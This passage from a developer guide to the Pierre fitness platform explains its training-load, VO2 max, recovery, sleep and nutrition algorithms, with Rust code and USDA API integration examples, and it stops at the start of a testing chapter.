This chapter explores how Pierre implements sports science algorithms for training load management, fitness tracking, and performance estimation. You’ll learn about TSS calculation, CTL/ATL/TSB (Performance Manager Chart), VO2 max estimation, FTP detection, and algorithm configuration patterns.
Algorithm Configuration Pattern
Pierre uses enums to select between multiple algorithm implementations:
User selects algorithm → Enum variant → Implementation strategy → Result
Pattern benefits:
- Flexibility: Easy to add new algorithms
- Testability: Compare algorithm outputs for validation
- User choice: Power users can optimize for their data/use case
- Backwards compatibility: Default impl when new algorithms added
Training Stress Score TSS
TSS quantifies training load from a single workout.
Source: src/intelligence/algorithms/tss.rs:10-52
#![allow(unused)]
fn main() {
/// TSS calculation algorithm selection
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
#[derive(Default)]
pub enum TssAlgorithm {
/// Average power based TSS (current default)
///
/// Formula: `duration_hours x (avg_power/FTP)² x 100`
///
/// Pros: O(1) computation, works without power stream
/// Cons: Underestimates variable efforts by 15-30%
#[default]
AvgPower,
/// Normalized Power based TSS (industry standard)
///
/// Formula: `duration_hours x (NP/FTP)² x 100`
///
/// `NP = ⁴√(mean(mean_per_30s_window(power⁴)))`
///
/// Pros: Physiologically accurate (R²=0.92 vs glycogen depletion)
/// Cons: Requires ≥30s power stream data
NormalizedPower {
/// Rolling window size in seconds (standard: 30)
window_seconds: u32,
},
/// Hybrid approach: Try NP, fallback to `avg_power` if stream unavailable
///
/// Best of both worlds for defensive programming
Hybrid,
}
}
TSS interpretation:
- < 150: Easy recovery ride/run
- 150-300: Moderate workout
- 300-450: Hard training session
- > 450: Very hard/race effort
Average Power TSS (simple):
Source: src/intelligence/algorithms/tss.rs:111-124
#![allow(unused)]
fn main() {
fn calculate_avg_power_tss(
activity: &Activity,
ftp: f64,
duration_hours: f64,
) -> Result<f64, AppError> {
let avg_power = f64::from(
activity
.average_power
.ok_or_else(|| AppError::not_found("average power data".to_owned()))?,
);
let intensity_factor = avg_power / ftp;
Ok((duration_hours * intensity_factor * intensity_factor * TSS_BASE_MULTIPLIER).round())
}
}
Normalized Power TSS (accurate):
Source: src/intelligence/algorithms/tss.rs:129-139
#![allow(unused)]
fn main() {
fn calculate_np_tss(
activity: &Activity,
ftp: f64,
duration_hours: f64,
window_seconds: u32,
) -> Result<f64, AppError> {
// Calculate TSS using normalized power from activity power stream data
let np = Self::calculate_normalized_power(activity, window_seconds)?;
let intensity_factor = np / ftp;
Ok((duration_hours * intensity_factor * intensity_factor * TSS_BASE_MULTIPLIER).round())
}
}
Normalized Power formula:
NP = ⁴√(mean(mean_per_30s_window(power⁴)))
Why 4th power: Matches physiological stress curve (glycogen depletion, lactate accumulation).
CTL/ATL/TSB (performance Manager Chart)
CTL/ATL/TSB track fitness, fatigue, and form over time.
Definitions:
- CTL (Chronic Training Load): 42-day exponential moving average of TSS (fitness)
- ATL (Acute Training Load): 7-day exponential moving average of TSS (fatigue)
- TSB (Training Stress Balance): CTL - ATL (form/freshness)
Source: src/intelligence/algorithms/training_load.rs:8-85
#![allow(unused)]
fn main() {
/// Training load calculation algorithm selection
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
#[serde(rename_all = "snake_case")]
pub enum TrainingLoadAlgorithm {
/// Exponential Moving Average (EMA)
///
/// Formula: `α = 2/(N+1)`, `EMA_t = α x TSS_t + (1-α) x EMA_{t-1}`
///
/// Standard method used by TrainingPeaks Performance Manager Chart.
/// Recent days weighted more heavily with exponential decay.
Ema {
/// CTL window in days (default 42 for fitness)
ctl_days: i64,
/// ATL window in days (default 7 for fatigue)
atl_days: i64,
},
/// Simple Moving Average (SMA)
///
/// Formula: `SMA = Σ(TSS_i) / N` for i in [t-N+1, t]
///
/// All days in window weighted equally.
Sma {
ctl_days: i64,
atl_days: i64,
},
/// Weighted Moving Average (WMA)
///
/// Formula: `WMA = Σ(w_i x TSS_i) / Σ(w_i)` where `w_i = i` (linear weights)
///
/// Recent days weighted linearly more than older days.
Wma {
ctl_days: i64,
atl_days: i64,
},
/// Kalman Filter
///
/// State-space model with process and measurement noise.
/// Optimal estimation when data is noisy or has gaps.
KalmanFilter {
/// Process noise (training load variability)
process_noise: f64,
/// Measurement noise (TSS measurement error)
measurement_noise: f64,
},
}
}
EMA calculation:
Source: src/intelligence/algorithms/training_load.rs:122-136
#![allow(unused)]
fn main() {
pub fn calculate_ctl(&self, tss_data: &[TssDataPoint]) -> Result<f64, AppError> {
if tss_data.is_empty() {
return Ok(0.0);
}
match self {
Self::Ema { ctl_days, .. } => Self::calculate_ema(tss_data, *ctl_days),
Self::Sma { ctl_days, .. } => Self::calculate_sma(tss_data, *ctl_days),
Self::Wma { ctl_days, .. } => Self::calculate_wma(tss_data, *ctl_days),
Self::KalmanFilter {
process_noise,
measurement_noise,
} => Self::calculate_kalman(tss_data, *process_noise, *measurement_noise),
}
}
}
TSB interpretation:
- TSB > +25: Well-rested, ready for peak performance
- TSB +10 to +25: Fresh, good for races
- TSB -10 to +10: Balanced, sustainable training
- TSB -10 to -30: Fatigued, productive overload
- TSB < -30: High risk of overtraining
EMA formula:
α = 2 / (N + 1)
CTL_today = α × TSS_today + (1 - α) × CTL_yesterday
For CTL (N=42): α = 2/43 ≈ 0.0465 (slow adaptation)
For ATL (N=7): α = 2/8 = 0.25 (fast response)
VO2 Max Estimation
VO2 max represents maximal aerobic capacity (ml/kg/min).
Source: src/intelligence/algorithms/vo2max.rs:18-100
#![allow(unused)]
fn main() {
/// VO2max estimation algorithm selection
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
#[serde(rename_all = "snake_case")]
pub enum Vo2maxAlgorithm {
/// From Jack Daniels' VDOT
///
/// Formula: `VO2max = VDOT x 3.5`
///
/// VDOT is Jack Daniels' running economy-adjusted VO2max measure.
FromVdot {
/// VDOT value (30-85 for recreational to elite)
vdot: f64,
},
/// Cooper 12-Minute Run Test
///
/// Formula: `VO2max = (distance_meters - 504.9) / 44.73`
///
/// Run as far as possible in 12 minutes on a flat track.
CooperTest {
/// Distance covered in 12 minutes (meters)
distance_meters: f64,
},
/// Rockport 1-Mile Walk Test
///
/// Formula: `VO2max = 132.853 - 0.0769×weight - 0.3877×age + 6.315×gender - 3.2649×time - 0.1565×HR`
///
/// Walk 1 mile as fast as possible, measure time and heart rate at finish.
/// Gender: 0 = female, 1 = male
RockportWalk {
weight_kg: f64,
age: u8,
gender: u8,
time_seconds: f64,
heart_rate: f64,
},
/// Åstrand-Ryhming Cycle Ergometer Test
///
/// Submaximal cycle test at steady-state heart rate (120-170 bpm).
AstrandRyhming {
gender: u8,
heart_rate: f64,
power_watts: f64,
},
/// Speed-based VO2max estimation from race performance
///
/// Formula: `VO2max = 15.3 × (MaxSpeed / RecoverySpeed)`
///
/// Uses maximum sustainable speed vs recovery speed ratio.
FromPace {
/// Maximum speed in m/s during test
max_speed_ms: f64,
/// Recovery speed in m/s
recovery_speed_ms: f64,
},
/// Hybrid: Auto-select best method based on available data
///
/// Attempts to use the most appropriate algorithm given available
/// test parameters. Returns error if insufficient data provided.
Hybrid,
}
}
VO2 max ranges (ml/kg/min):
- Untrained: 30-40 (recreational)
- Trained: 40-50 (club runner)
- Well-trained: 50-60 (competitive)
- Elite: 60-70 (national level)
- World-class: 70-85 (Olympic/professional)
Cooper Test example:
Distance: 3000 meters in 12 minutes
VO2max = (3000 - 504.9) / 44.73 ≈ 55.8 ml/kg/min (well-trained)
Algorithm Selection Pattern
All algorithms follow the same pattern:
#![allow(unused)]
fn main() {
enum Algorithm {
Method1 { params },
Method2 { params },
Method3,
}
impl Algorithm {
fn calculate(&self, data: &Data) -> Result<f64> {
match self {
Self::Method1 { params } => /* implementation */,
Self::Method2 { params } => /* implementation */,
Self::Method3 => /* implementation */,
}
}
}
}
Benefits:
- Type safety: Compiler ensures all enum variants handled
- Documentation: Variant doc comments explain algorithms
- Flexibility: Easy to add new algorithms
- Configuration: Serialize/deserialize for user preferences
- Testing: Compare algorithms for validation
Scientific Validation
Pierre includes scientific references for algorithms:
TSS references:
- Coggan, A. & Allen, H. (2010). “Training and Racing with a Power Meter.” VeloPress.
- Sanders, D. & Heijboer, M. (2018). “The anaerobic power reserve.” J Sports Sci, 36(6), 621-629.
CTL/ATL/TSB references:
- Coggan, A. (2003). “Training and Racing Using a Power Meter.” Peaksware LLC.
- Banister, E.W. (1991). “Modeling elite athletic performance.” Physiological Testing of Elite Athletes.
VO2 max references:
- Daniels, J. (2013). “Daniels’ Running Formula” (3rd ed.). Human Kinetics.
- Cooper, K.H. (1968). “A means of assessing maximal oxygen intake.” JAMA, 203(3), 201-204.
Validation approach:
- Literature-based: All formulas from peer-reviewed research
- Industry standards: TrainingPeaks, Strava algorithms as benchmarks
- Correlation studies: Verify against physiological measurements
Key Takeaways
-
Enum-based selection: All algorithms use enum pattern for flexibility and type safety.
-
TSS calculation: Average power (fast, less accurate) vs Normalized Power (slow, more accurate).
-
CTL/ATL/TSB: 42-day fitness, 7-day fatigue, balance indicates form/readiness.
-
EMA standard: Exponential moving average matches TrainingPeaks industry standard.
-
VO2 max estimation: Multiple test protocols (Cooper, Rockport, Åstrand-Ryhming).
-
Scientific references: All algorithms cite peer-reviewed research for validation.
-
Multiple strategies: Users can choose algorithms based on data availability and preferences.
-
Hybrid fallback: Defensive programming with primary + fallback implementations.
-
Documentation in code: Variant doc comments explain formulas, pros/cons, scientific basis.
-
Serde support: All algorithms serialize/deserialize for configuration persistence.
Detailed Methodology Reference
For comprehensive technical documentation of all sports science algorithms, see the Intelligence Methodology Document in the Pierre source repository:
docs/intelligence-methodology.md
This 100+ section reference document covers:
| Topic | Description |
|---|---|
| Architecture Overview | Foundation modules, core modules, 47 intelligence tools |
| Data Sources | Primary data, user profiles, provider normalization |
| Personalization Engine | Age-based MaxHR, HR zones, power zones |
| Core Metrics | Pace/speed conversion, TSS variants, Normalized Power |
| Training Load | CTL/ATL/TSB mathematical formulation with EMA |
| Overtraining Detection | Risk indicators and warning thresholds |
| VDOT Performance | Daniels tables, race prediction, accuracy verification |
| Pattern Recognition | Weekly schedules, hard/easy alternation, volume progression |
| Sleep & Recovery | Sleep quality scoring, recovery score calculation |
| Validation & Safety | Parameter bounds, confidence levels, edge cases |
| Configuration Strategies | Conservative, default, aggressive profiles |
| Debugging Guide | Metric-specific troubleshooting, platform issues |
For implementers: The methodology document includes complete formulas, code examples, and scientific references for every algorithm in the Pierre intelligence engine.
Next Chapter: Chapter 21: Training Load, Recovery & Sleep Analysis - Learn how Pierre analyzes recovery metrics, sleep quality, HRV, and suggests optimal training intensity based on recovery status.
Chapter 21: Training Load, Recovery & Sleep Analysis
This chapter covers how Pierre analyzes recovery metrics, sleep quality, training load management, and provides rest day suggestions. You’ll learn about recovery score calculation, sleep stage analysis, HRV interpretation, and overtraining detection.
Cross-Provider Support
Pierre supports fetching activity data and sleep/recovery data from different providers. This enables scenarios where you use specialized devices for different purposes:
Example Configurations:
- Strava + WHOOP: Track runs with Strava’s GPS accuracy, get recovery metrics from WHOOP’s HRV monitoring
- Garmin + Fitbit: Running metrics from Garmin, lifestyle/sleep tracking from Fitbit
- Any combination: Mix and match based on your device ecosystem
How It Works:
When calling sleep/recovery tools, you can specify separate providers:
{
"activity_provider": "strava",
"sleep_provider": "whoop"
}
Auto-Selection Priority:
- Activity providers: strava > garmin > fitbit > whoop > terra
- Sleep providers: whoop > garmin > fitbit > terra
The system automatically selects the best connected provider if not specified, prioritizing providers known for their specialty (e.g., WHOOP for recovery, Strava for activities).
Response Metadata:
All cross-provider responses include information about which providers were used:
{
"recovery_score": { ... },
"providers_used": {
"activity_provider": "strava",
"sleep_provider": "whoop"
}
}
Intelligence Tools with Cross-Provider Support
The following intelligence tools also support cross-provider analysis via the sleep_provider parameter:
calculate_fitness_score: When sleep_provider is specified, recovery quality factors into the fitness score:
{
"tool": "calculate_fitness_score",
"parameters": {
"provider": "strava",
"sleep_provider": "whoop",
"timeframe": "month"
}
}
Recovery adjustment factors:
| Recovery Score | Adjustment |
|---|---|
| 90-100 (Excellent) | +5% bonus |
| 70-89 (Good) | No change |
| 50-69 (Moderate) | -5% penalty |
| <50 (Poor) | -10% penalty |
analyze_training_load: When sleep_provider is specified, adds recovery context to training load analysis:
{
"tool": "analyze_training_load",
"parameters": {
"provider": "strava",
"sleep_provider": "whoop",
"timeframe": "week"
}
}
Response includes recovery context:
{
"training_load": { "ctl": 65, "atl": 80, "tsb": -15 },
"recovery_context": {
"sleep_quality_score": 78,
"recovery_status": "good",
"hrv_rmssd": 55.3,
"sleep_hours": 7.2,
"sleep_provider": "whoop"
}
}
Recovery Score Calculation
Pierre calculates a composite recovery score from multiple metrics.
Recovery factors:
- Sleep quality: Duration, efficiency, deep sleep percentage
- Resting heart rate: Compared to baseline (elevated RHR = fatigue)
- HRV: Heart rate variability (higher = better recovery)
- Training load: Recent TSS vs historical average
- Muscle soreness: Self-reported or inferred from performance
- Sleep debt: Cumulative sleep deficit
Recovery score formula (conceptual):
Recovery Score = (
sleep_score × 0.30 +
hrv_score × 0.25 +
rhr_score × 0.20 +
training_load_score × 0.15 +
sleep_debt_score × 0.10
) × 100
Score interpretation:
- 90-100: Fully recovered, ready for hard training
- 70-89: Good recovery, moderate-hard training OK
- 50-69: Partial recovery, easy-moderate training
- < 50: Poor recovery, rest day recommended
Sleep Quality Analysis
Pierre analyzes sleep sessions from Fitbit, Garmin, and other providers.
Sleep metrics:
- Total sleep time: Duration in bed asleep
- Sleep efficiency: Time asleep / time in bed × 100%
- Sleep stages: Awake, light, deep, REM percentages
- Sleep onset latency: Time to fall asleep
- Wake episodes: Number of awakenings
- Sleep debt: Cumulative shortfall vs target (7-9 hours)
Sleep stage targets (% of total sleep):
- Deep sleep: 15-25% (restorative, hormone release)
- REM sleep: 20-25% (memory consolidation, mental recovery)
- Light sleep: 50-60% (transition stages)
Sleep efficiency benchmarks:
- > 90%: Excellent
- 85-90%: Good
- 75-85%: Fair
- < 75%: Poor (consider sleep hygiene improvements)
HRV (heart Rate Variability)
HRV measures nervous system recovery via beat-to-beat timing variation.
HRV metrics:
- RMSSD: Root mean square of successive differences (ms)
- SDNN: Standard deviation of NN intervals (ms)
- pNN50: Percentage of successive intervals > 50ms different
HRV interpretation (RMSSD):
- > 100ms: Excellent recovery
- 60-100ms: Good recovery
- 40-60ms: Moderate recovery
- 20-40ms: Poor recovery
- < 20ms: Very poor recovery, rest day needed
HRV trends matter more than absolute values: Compare to personal baseline rather than population norms.
Overtraining Detection
Pierre monitors for overtraining syndrome indicators.
Overtraining warning signs:
- Elevated resting heart rate: +5-10 BPM above baseline for 3+ days
- Decreased HRV: > 20% below baseline for consecutive days
- Excessive TSB: Training Stress Balance < -30 for extended period
- Performance decline: Slower paces at same effort level
- Persistent fatigue: Low recovery scores despite rest
- Sleep disturbances: Difficulty falling/staying asleep
- Mood changes: Irritability, loss of motivation
Overtraining prevention:
IF resting_hr > baseline + 8 AND hrv < baseline × 0.8 AND tsb < -30:
RECOMMEND: 2-3 rest days
ALERT: Overtraining risk detected
REST Day Suggestions
Pierre suggests rest days based on accumulated fatigue.
Rest day algorithm (conceptual):
#![allow(unused)]
fn main() {
fn suggest_rest_day(
recovery_score: f64,
tsb: f64,
consecutive_hard_days: u32,
hrv_trend: f64,
) -> RestDaySuggestion {
// Critical indicators
if recovery_score < 30.0 || tsb < -40.0 {
return RestDaySuggestion::Immediate;
}
// High fatigue
if recovery_score < 50.0 && consecutive_hard_days >= 3 {
return RestDaySuggestion::Soon;
}
// Preventive rest
if consecutive_hard_days >= 6 || tsb < -20.0 {
return RestDaySuggestion::NextDay;
}
RestDaySuggestion::None
}
}
Rest day types:
- Complete rest: No training, focus on sleep/nutrition
- Active recovery: Easy 20-30 min at < 60% max HR
- Light cross-training: Different sport, low intensity
Training Load vs Recovery Balance
Pierre tracks the balance between training stress and recovery.
Optimal balance indicators:
- TSB: -10 to +10 (productive training without excessive fatigue)
- Weekly TSS: Consistent with 5-10% week-over-week growth
- Recovery days: 1-2 per week for most athletes
- Hard:Easy ratio: 1:2 or 1:3 (one hard day per 2-3 easy days)
Periodization support:
Build Phase: TSB -10 to -20, weekly TSS +5-10%
Recovery Week: TSB +10 to +20, weekly TSS -40-50%
Peak Phase: TSB +15 to +25, weekly TSS -30%
Race Day: TSB +20 to +30 (fresh and rested)
Sleep Optimization Recommendations
Pierre provides personalized sleep recommendations.
Sleep hygiene tips:
- Consistent schedule: Same bedtime/wake time daily (±30 min)
- Sleep environment: Cool (60-67°F), dark, quiet
- Pre-bed routine: Wind down 30-60 min before sleep
- Limit caffeine: No caffeine 6+ hours before bed
- Limit screens: Blue light suppresses melatonin (avoid 1-2hr before bed)
Sleep timing for athletes:
- After hard training: Need 1-2 hours extra sleep for recovery
- Before race/key workout: 8-9 hours recommended
- Naps: 20-30 min power naps OK, avoid long naps (>90 min)
Key Takeaways
-
Recovery score: Composite metric from sleep, HRV, RHR, training load, and sleep debt.
-
Sleep stages: Deep sleep (15-25%), REM (20-25%), light (50-60%) for optimal recovery.
-
HRV: Beat-to-beat variation indicates nervous system recovery (higher = better).
-
Overtraining detection: Elevated RHR + decreased HRV + negative TSB = warning signs.
-
Rest day algorithm: Considers recovery score, TSB, consecutive hard days, HRV trends.
-
TSB sweet spot: -10 to +10 for sustainable training without overreaching.
-
Sleep efficiency: Time asleep / time in bed > 85% indicates good sleep quality.
-
Personal baselines: Compare metrics to individual baseline, not population averages.
-
Periodization: Planned recovery weeks (TSB +10 to +20) prevent cumulative fatigue.
-
Holistic approach: Balance training load, recovery, sleep, nutrition for optimal adaptation.
Next Chapter: Chapter 22: Nutrition System & USDA Integration - Learn how Pierre calculates daily nutrition needs, integrates with the USDA food database, analyzes meal nutrition, and provides nutrient timing recommendations.
Chapter 22: Nutrition System & USDA Integration
This chapter covers Pierre’s nutrition system including daily calorie/macro calculations, USDA food database integration, meal analysis, and nutrient timing for athletes. You’ll learn about energy expenditure estimation, protein requirements, and post-workout nutrition windows.
Daily Nutrition Calculation
Pierre calculates personalized daily nutrition needs based on training load.
Total Daily Energy Expenditure (TDEE):
TDEE = BMR + Activity Calories + Exercise Calories + TEF
Where:
- BMR (Basal Metabolic Rate): Resting energy expenditure
- Activity Calories: Daily lifestyle activity
- Exercise Calories: Planned training
- TEF (Thermic Effect of Food): Digestion cost (~10% of intake)
BMR calculation (Mifflin-St Jeor equation):
Men: BMR = 10 × weight_kg + 6.25 × height_cm - 5 × age + 5
Women: BMR = 10 × weight_kg + 6.25 × height_cm - 5 × age - 161
Activity multipliers:
- Sedentary: 1.2 (desk job, minimal activity)
- Lightly active: 1.375 (light exercise 1-3 days/week)
- Moderately active: 1.55 (moderate exercise 3-5 days/week)
- Very active: 1.725 (hard exercise 6-7 days/week)
- Extremely active: 1.9 (athlete, 2x/day training)
Exercise calories (from activity data):
Calories = TSS × 1.0 (approximation: 1 TSS ≈ 1 kcal for cycling)
Or use heart rate-based:
Calories = duration_min × (0.6309 × HR + 0.1988 × weight_kg + 0.2017 × age - 55.0969) / 4.184
Macronutrient Targets
Pierre recommends macros based on sport and training phase.
Protein requirements (g/kg body weight/day):
- Endurance athletes: 1.2-1.6 g/kg
- Strength athletes: 1.6-2.2 g/kg
- Ultra-endurance: 1.6-2.0 g/kg
- Recovery day: 1.2-1.4 g/kg
Carbohydrate requirements (g/kg/day):
- Low intensity: 3-5 g/kg
- Moderate training (1hr/day): 5-7 g/kg
- High volume (1-3hr/day): 6-10 g/kg
- Extreme volume (4-5hr/day): 8-12 g/kg
Fat requirements:
- Minimum: 0.8-1.0 g/kg (hormone production, vitamin absorption)
- Typical: 20-35% of total calories
- Low-carb athletes: Up to 60-70% of calories (fat-adapted)
Example calculation (70kg cyclist, moderate training):
TDEE: 2800 kcal
Protein: 70kg × 1.4 g/kg = 98g (392 kcal)
Carbs: 70kg × 6 g/kg = 420g (1680 kcal)
Fat: Remaining = (2800 - 392 - 1680) / 9 = 81g (728 kcal)
Macros: 14% protein / 60% carbs / 26% fat
USDA FoodData Central Integration
Pierre integrates with USDA’s food database for nutrition data.
USDA API endpoints:
/foods/search: Search food database/food/{fdcId}: Get detailed nutrition data/foods/list: Browse food categories
Food search (conceptual):
#![allow(unused)]
fn main() {
async fn search_food(query: &str) -> Result<Vec<FoodSearchResult>> {
let url = format!(
"https://api.nal.usda.gov/fdc/v1/foods/search?query={}&api_key={}",
query, api_key
);
let response: UsdaSearchResponse = client.get(url).send().await?.json().await?;
Ok(response.foods.into_iter().map(|food| FoodSearchResult {
fdc_id: food.fdc_id,
description: food.description,
brand_name: food.brand_name,
serving_size: food.serving_size,
serving_unit: food.serving_unit,
}).collect())
}
}
Food nutrition details:
{
"fdcId": 171705,
"description": "Banana, raw",
"foodNutrients": [
{
"nutrientName": "Protein",
"value": 1.09,
"unitName": "G"
},
{
"nutrientName": "Total lipid (fat)",
"value": 0.33,
"unitName": "G"
},
{
"nutrientName": "Carbohydrate, by difference",
"value": 22.84,
"unitName": "G"
},
{
"nutrientName": "Energy",
"value": 89,
"unitName": "KCAL"
}
]
}
Meal Nutrition Analysis
Pierre analyzes complete meals from multiple foods.
Meal analysis input:
{
"foods": [
{"fdc_id": 171705, "servings": 1, "description": "Banana"},
{"fdc_id": 174608, "servings": 2, "description": "Peanut butter, 2 tbsp"},
{"fdc_id": 173757, "servings": 2, "description": "Whole wheat bread, 2 slices"}
]
}
Meal analysis output:
{
"total_calories": 450,
"total_protein_g": 16,
"total_carbs_g": 58,
"total_fat_g": 18,
"macro_percentages": {
"protein": 14,
"carbs": 52,
"fat": 34
},
"micronutrients": {
"vitamin_b6_mg": 0.8,
"potassium_mg": 850,
"fiber_g": 10
}
}
Nutrient Timing
Pierre provides timing recommendations for optimal performance and recovery.
Pre-workout nutrition (1-3 hours before):
- Carbs: 1-4 g/kg body weight (fuel glycogen stores)
- Protein: 0.15-0.25 g/kg (reduce muscle breakdown)
- Fat: Minimal (slows digestion)
- Example: Oatmeal (60g) + banana + protein shake
During workout (>90 minutes):
- Carbs: 30-60 g/hour (maintain blood glucose)
- Electrolytes: Sodium 500-700 mg/L (prevent hyponatremia)
- Fluid: 400-800 ml/hour (depends on sweat rate)
Post-workout nutrition (within 30-60 min):
- Carbs: 1.0-1.2 g/kg (replenish glycogen)
- Protein: 0.25-0.3 g/kg (muscle protein synthesis)
- Ratio: 3:1 to 4:1 carb:protein optimal
- Example (70kg athlete): 70-84g carbs + 18-21g protein
Anabolic window:
- 0-2 hours post-exercise: Glycogen synthesis rate 2-3× higher
- Protein synthesis: Elevated 24-48 hours (not just 30min window)
- Practical: Eat within 2 hours, total daily intake matters most
Cross-Provider Intensity Inference
The get_nutrient_timing tool supports cross-provider activity data to auto-infer workout intensity:
{
"tool": "get_nutrient_timing",
"parameters": {
"weight_kg": 70,
"daily_protein_g": 140,
"activity_provider": "strava",
"days_back": 7
}
}
How intensity is inferred:
- Fetches recent activities from the specified provider
- Analyzes training volume (hours/day) and heart rate patterns
- Returns
intensity_source: "inferred"in the response
Inference thresholds:
| Intensity | Training Volume | Avg Heart Rate |
|---|---|---|
| High | >2 hours/day | >150 bpm |
| Moderate | 1-2 hours/day | 130-150 bpm |
| Low | <1 hour/day | <130 bpm |
Fallback behavior: If activity fetch fails and workout_intensity is also provided, falls back to the explicit value. If neither succeeds, returns an error.
Carbohydrate Periodization
Pierre adjusts carb intake based on training intensity.
Daily carb adjustment:
Rest day: 3-4 g/kg (maintenance)
Easy day: 4-5 g/kg (light recovery)
Moderate day: 5-7 g/kg (typical training)
Hard day: 7-9 g/kg (high intensity)
Race day: 8-12 g/kg (maximum fueling)
Benefits of periodization:
- Metabolic flexibility: Trains fat oxidation on low-carb days
- Glycogen supercompensation: Maximizes storage for key workouts
- Body composition: Reduces excess carbs on easy days
- Performance: Fuels hard sessions adequately
Example week (70kg cyclist):
Monday (rest): 70kg × 3g = 210g carbs
Tuesday (easy): 70kg × 5g = 350g carbs
Wednesday (hard): 70kg × 8g = 560g carbs
Thursday (moderate): 70kg × 6g = 420g carbs
Friday (easy): 70kg × 5g = 350g carbs
Saturday (long): 70kg × 9g = 630g carbs
Sunday (race): 70kg × 10g = 700g carbs
Hydration Recommendations
Pierre calculates sweat rate and hydration needs.
Sweat rate calculation:
Sweat Rate (L/hr) = (Pre-Weight - Post-Weight + Fluid Consumed - Urine Output) / Duration
Example:
Pre: 70.0 kg
Post: 69.2 kg
Fluid: 0.5 L
Duration: 1 hour
Sweat Rate = (70.0 - 69.2 + 0.5 - 0) / 1 = 1.3 L/hr
Hydration guidelines:
- Daily baseline: 30-35 ml/kg body weight
- Pre-exercise: 5-7 ml/kg 2-4 hours before
- During exercise: Replace 60-80% of sweat losses
- Post-exercise: 150% of fluid deficit (1.5L for each kg lost)
Electrolyte needs (sodium):
- Low sweaters: 300-500 mg/L
- Average: 500-800 mg/L
- Heavy/salty sweaters: 800-1200 mg/L
Recipe Management (Combat des Chefs)
Pierre provides training-aware recipe management using the “Combat des Chefs” architecture:
- LLM clients generate recipes (cost-efficient, creative)
- Pierre validates nutrition via USDA (accurate, authoritative)
- Per-user storage (private recipe collections)
Meal Timing & Macro Targets
Recipes are categorized by training timing with specific macro distributions:
| Meal Timing | Protein | Carbs | Fat | Use Case |
|---|---|---|---|---|
pre_training | 20% | 55% | 25% | 1-3 hours before workout |
post_training | 30% | 45% | 25% | Within 60 min after workout |
rest_day | 30% | 35% | 35% | Recovery days, lower carb |
general | 25% | 45% | 30% | Balanced everyday meals |
Recipe Workflow
Step 1: Get Constraints
{
"tool": "get_recipe_constraints",
"parameters": {
"meal_timing": "post_training",
"target_calories": 600
}
}
Returns macro targets, guidelines, and example ingredients for the LLM to use.
Step 2: LLM Generates Recipe
The AI assistant creates a recipe based on constraints and user preferences.
Step 3: Validate with Pierre
{
"tool": "validate_recipe",
"parameters": {
"name": "Recovery Protein Bowl",
"meal_timing": "post_training",
"target_calories": 600,
"ingredients": [
{"name": "chicken breast", "quantity": 200, "unit": "grams"},
{"name": "brown rice", "quantity": 1, "unit": "cup"},
{"name": "broccoli", "quantity": 150, "unit": "grams"}
]
}
}
Pierre validates nutrition via USDA and returns:
- Actual calories and macros
- Compliance score vs targets
- Suggestions for improvements
Step 4: Save if Valid
{
"tool": "save_recipe",
"parameters": {
"name": "Recovery Protein Bowl",
"meal_timing": "post_training",
"ingredients": [...],
"instructions": ["Cook rice", "Grill chicken", "Steam broccoli", "Combine and serve"],
"tags": ["high-protein", "post-workout", "quick"]
}
}
Unit Conversion
Pierre automatically converts common units to grams for accurate nutrition lookup:
| Category | Units | Example Conversion |
|---|---|---|
| Weight | oz, lb, kg | 1 oz → 28.35g |
| Volume | cups, tbsp, tsp, ml | 1 cup → ~240g (varies by ingredient) |
| Count | pieces, whole | 1 banana → ~118g |
Recipe Tools Summary
| Tool | Purpose |
|---|---|
get_recipe_constraints | Get macro targets for meal timing |
validate_recipe | Validate nutrition via USDA |
save_recipe | Store in user’s collection |
list_recipes | Browse saved recipes |
get_recipe | Retrieve specific recipe |
delete_recipe | Remove from collection |
search_recipes | Find by name/ingredients/tags |
Key Takeaways
-
TDEE calculation: BMR + activity + exercise + TEF determines daily calorie needs.
-
Protein: 1.2-2.2 g/kg depending on sport and training phase.
-
Carbs: 3-12 g/kg based on training volume and intensity.
-
USDA integration: 800,000+ foods with detailed nutrition data via FoodData Central API.
-
Meal analysis: Sum nutrition from multiple foods for complete meal breakdown.
-
Nutrient timing: Pre (1-3hr), during (>90min), post (30-60min) windows optimize performance.
-
Carb periodization: Match carb intake to training intensity for metabolic flexibility.
-
Sweat rate: Measure weight before/after to calculate individual fluid needs.
-
Post-workout ratio: 3:1 to 4:1 carb:protein ratio optimizes recovery.
-
Total daily intake: 24-hour totals matter more than strict timing windows.
-
Combat des Chefs: LLM generates recipes, Pierre validates via USDA for accuracy.
-
Meal timing macros: Pre-training (high carb), post-training (high protein), rest day (balanced).
Detailed Methodology Reference
For comprehensive technical documentation of all nutrition algorithms and USDA integration, see the Nutrition Methodology Document in the Pierre source repository:
This detailed reference document covers:
| Topic | Description |
|---|---|
| BMR Calculation | Mifflin-St Jeor equation with step-by-step derivation |
| TDEE Calculation | Activity multipliers, TEF, exercise adjustments |
| Macro Ratios | Sport-specific protein/carb/fat recommendations |
| USDA Integration | FoodData Central API, search patterns, caching |
| Portion Estimation | Unit conversion tables, ingredient density |
| Meal Analysis | Aggregation algorithms, nutrient completeness |
| Timing Windows | Pre/during/post exercise optimization |
| Hydration | Sweat rate calculation, electrolyte needs |
| Recipe Validation | Compliance scoring, macro target matching |
| Edge Cases | Missing nutrients, unknown foods, fallbacks |
For implementers: The methodology document includes complete formulas, USDA API examples, and validation rules for every nutrition tool in Pierre.
End of Part VI: Tools & Intelligence
You’ve completed the tools and intelligence section. You now understand:
- All 47 MCP tools and their usage (Chapter 19)
- Sports science algorithms (Chapter 20)
- Recovery and sleep analysis (Chapter 21)
- Nutrition system, USDA integration, and recipe management (Chapter 22)
Next Chapter: Chapter 23: Testing Framework - Begin Part VII by learning about Pierre’s testing infrastructure including synthetic data generation, E2E tests, tools-to-types validation, and test organization.
Chapter 23: Testing Framework - Comprehensive Testing Patterns
This chapter covers Pierre’s testing infrastructure including database testing, integration patterns, synthetic data generation, async testing, error testing, and test organization best practices.
Database Testing Patterns
Pierre uses in-memory SQLite databases for fast, isolated tests without external dependencies.
In-Memory Database Setup
Source: tests/database_memory_test.rs:18-71
#![allow(unused)]
fn main() {
#[tokio::test]
async fn test_memory_database_no_physical_files() -> Result<()> {
let encryption_key = generate_encryption_key().to_vec();
// Create in-memory database - NO physical files
let database = Database::new("sqlite::memory:", encryption_key).await?;
// Verify no physical files are created
let current_dir = std::env::current_dir()?;
